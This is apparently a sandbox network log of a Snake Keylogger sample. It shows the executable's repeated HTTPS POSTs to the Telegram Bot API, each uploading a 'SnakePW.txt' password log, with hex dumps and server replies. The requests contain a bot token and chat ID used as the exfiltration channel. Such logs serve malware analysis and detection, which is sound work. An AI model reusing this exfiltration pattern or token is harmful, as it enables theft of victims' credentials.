                            2022-06-26 07:34:39 UTC474OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 36 39 34 37 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571c6947c9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:39 UTC475INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:39 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:39 UTC475INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67068,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228879,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            282192.168.2.550216149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:39 UTC476OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ca7423b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:39 UTC476OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 61 37 34 32 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ca7423bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:40 UTC477INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:40 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:40 UTC477INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67069,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228880,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            283192.168.2.550217149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:40 UTC477OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ce2db9d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:40 UTC478OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 65 32 64 62 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ce2db9dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:40 UTC478INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:40 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:40 UTC479INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67070,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228880,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            284192.168.2.550218149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:40 UTC479OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571d19b236
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:40 UTC479OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 31 39 62 32 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571d19b236Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:40 UTC480INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:40 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:40 UTC480INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67071,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228880,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            285192.168.2.550219149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:40 UTC481OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571d554d65
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:40 UTC481OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 35 35 34 64 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571d554d65Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:41 UTC482INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:41 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:41 UTC482INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67072,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228881,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            286192.168.2.550220149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:41 UTC482OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571d8c298d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:41 UTC483OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 38 63 32 39 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571d8c298dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:41 UTC483INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:41 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:41 UTC484INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67073,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228881,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            287192.168.2.550221149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:41 UTC484OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575719153ffd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:41 UTC484OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 31 35 33 66 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575719153ffdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:42 UTC485INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:41 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:42 UTC485INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67074,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228881,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            288192.168.2.550222149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:42 UTC486OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571950daa0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:42 UTC486OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 35 30 64 61 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571950daa0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:42 UTC487INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
